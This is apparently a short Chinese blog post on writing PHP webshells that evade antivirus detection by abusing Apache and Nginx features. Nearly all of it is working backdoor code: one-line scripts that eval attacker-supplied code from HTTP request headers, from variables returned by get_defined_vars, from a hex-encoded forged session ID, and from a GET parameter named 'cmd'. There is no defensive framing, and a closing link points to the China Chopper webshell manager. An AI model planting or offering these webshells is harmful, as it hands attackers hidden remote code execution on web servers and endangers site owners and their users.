PHP利用Apache、Nginx的特性实现免杀Webshell

环境	函数	用法
nginx	`get_defined_vars()`	返回由所有已定义变量所组成的数组
apache	`getallheaders()`	获取全部 HTTP 请求头信息

<?php
eval(next(getallheaders())); 
?>

<?php

eval(next(getallheaders()));

<?php
eval(implode(reset(get_defined_vars())));
?>

<?php

eval(implode(reset(get_defined_vars())));

另外一种通过执行伪造的sessionid值，进行任意代码执行。

<?php
eval(hex2bin(session_id(session_start())));
?>

<?php

eval(hex2bin(session_id(session_start())));

给webshell加密码

<?php eval(get_defined_vars()['_GET']['cmd']);?>

1	<?php eval(get_defined_vars()['_GET']['cmd']);?>

标签：webshell 原文连接：PHP利用Apache、Nginx的特性实现免杀Webshell 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

中国菜刀Webshell管理工具归档在WordPress主题或插件中使用composer